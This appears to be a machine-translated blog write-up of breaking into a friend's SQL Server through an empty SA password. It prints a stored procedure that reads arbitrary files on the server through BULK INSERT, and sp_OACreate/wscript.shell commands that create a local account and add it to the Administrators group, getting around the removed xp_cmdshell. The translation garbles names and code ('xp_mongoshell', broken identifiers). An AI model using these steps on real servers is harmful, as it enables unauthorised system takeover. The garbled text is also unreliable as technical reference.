SQL Server SA empty password penetration test instance notes

A friend called me a few days ago and asked me to help test their servers. After scanning, I found that SQL Server SA was empty and decided to use this vulnerability for penetration testing. After testing, we found that the Stored Procedure xp_mongoshell and the Stored Procedure for reading the Registry series have been deleted, and the Xplog70.dll has also been deleted. Therefore, you cannot execute the CMD command or clone the administrator account, it looks like it is configured with security. According to my knowledge at the time, there is no way to intrude into the situation. I have encountered similar machines before, so I decided to use a few days to solve this problem.

After two days of data access and testing, you can obtain the contents of txt, asp, and other types of files from the target machine without using any stored procedures provided that you know that the SA password or SA password is empty ), the implementation process is to create a temporary table, read the file into the table, and then use the SELECT statement to obtain the returned value, that is, the content of the file. We can write a stored procedure into the query analyzer and then execute it. You only need to call the stored procedure as needed:

Create proc sp_readTextFile @ filename sysname

As

Begin

Set nocount on

Create table # tempfile (line varchar (8000 ))

Exec ('bulk insert # tempfile from "'+ @ filename + '"')

Select * from # tempfile

Drop table # tempfile

End

Go

In this way, you only need to execute a statement similar to the following to get the file content in the specified path:

Exec sp_readTextFile 'C: \ aaa. asp'

After implementing this function, I planned to read the asp code of the website on a friend's server for further intrusion, but later I found that because I did not know the absolute path of the asp file on the website, therefore, this function cannot be used at all, so we have to leave it alone and find another method. In the next few days, I think of a series of OLE-related stored procedures that are often mentioned in Security articles. These stored procedures are as dangerous as xp_mongoshell and the stored procedures for reading the Registry series, however, they are not used as many stored procedures on the network as described in the book. The stored procedures in this series include sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop, the following describes how to use the data:

Open the query analyzer, connect the SA to the target machine, and execute the following in the query Analyzer:

DECLARE @ shell int exec SP_OACREATE 'wscript. shell', @ shell OUTPUT EXEC

SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/c net user

Ceshi 1/add '--

In this way, a user with the username ceshi and password 1 is added to the other system, and then execute:

DECLARE @ shell int exec SP_OACREATE 'wscript. shell', @ shell OUTPUT EXEC

SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/c net localgroup

Administrators ceshi/add '--

Ceshi is added to the Administrator group.

Conclusion: Through this penetration test, we learned a method to control the SQL server with the storage process SA being empty.